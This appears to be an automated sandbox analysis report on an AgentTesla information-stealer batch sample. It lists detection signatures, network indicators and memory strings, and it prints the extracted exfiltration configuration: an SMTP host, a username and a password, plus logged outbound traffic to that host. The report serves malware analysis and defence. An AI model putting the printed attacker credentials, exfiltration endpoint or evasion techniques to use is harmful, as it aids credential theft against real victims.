Windows Analysis Report
87M9Y3P4Z7.bat

Overview

General Information

Sample name:	87M9Y3P4Z7.bat renamed because original name is a hash value
Original sample name:	5be496e81c311cc8c78b7d6422fb51e4b4fc3e332ef54eae2bc6495dac60acc7.bat
Analysis ID:	1545585
MD5:	0403cb08cd9a055952e1153dfd5a2e0e
SHA1:	b42d3e9e49a30671d54217268ae15e6c23b0f226
SHA256:	5be496e81c311cc8c78b7d6422fb51e4b4fc3e332ef54eae2bc6495dac60acc7
Tags:	AgentTeslabatuser-NDA0E
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops VBS files to the startup folder

Found large BAT file

Installs a global keyboard hook

Powershell is started from unusual location (likely to bypass HIPS)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses cmd line tools excessively to alter registry or file data

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Gzip Archive Decode Via PowerShell

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Signatures

AV Detection

Found malware configuration

Source: 8.2.InstallUtil.exe.380000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		7_2_089BD340
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		19_2_093AD340

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49757 -> 163.44.198.71:587

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 163.44.198.71 163.44.198.71

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.6:49757 -> 163.44.198.71:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: nffplp.com

Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059BF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2411444957.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2281586637.0000000006DD4000.00000004.00000020.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2281586637.0000000006D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
Source: InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/cPan/
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
Source: InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2413879182.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4698691808.000000000096E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nffplp.com
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000005908000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059BF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000005908000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
